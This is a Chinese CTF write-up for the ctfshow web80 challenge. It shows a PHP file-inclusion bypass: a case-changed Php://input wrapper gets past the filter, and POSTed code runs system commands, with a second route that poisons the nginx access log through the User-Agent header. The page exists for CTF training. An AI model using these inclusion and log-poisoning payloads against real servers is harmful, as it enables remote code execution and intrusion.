[ctfshow web入门] web80

信息收集

过滤了phpdata

php 复制代码
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据


日志绕过

php 复制代码
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
木子雨廷17 分钟前
Flutter 开发一个plugin
前端·flutter
重生之我是一名前端程序员20 分钟前
websocket + xterm 前端实现网页版终端
前端·websocket
sorryhc21 分钟前
【AI解读源码系列】ant design mobile——Space间距
前端·javascript·react.js
uhakadotcom36 分钟前
NPM与NPX的区别是什么?
前端·面试·github
GAMC1 小时前
如何修改node_modules的组件不被install替换?可以使用patch-package
前端
页面仔Dony1 小时前
webpack 与 Vite 深度对比
前端·前端工程化
Juchecar1 小时前
Vue3 组件生命周期详解
前端·vue.js
页面仔Dony1 小时前
打包工具配置base、publicPath字段的作用和区别
前端·前端工程化
gongzemin1 小时前
前端下载xlsx 提示试图打开文件时遇到错误
前端
我是ed1 小时前
# JS获取用户访问网页的浏览器、IP、地址等信息 实现访问统计
前端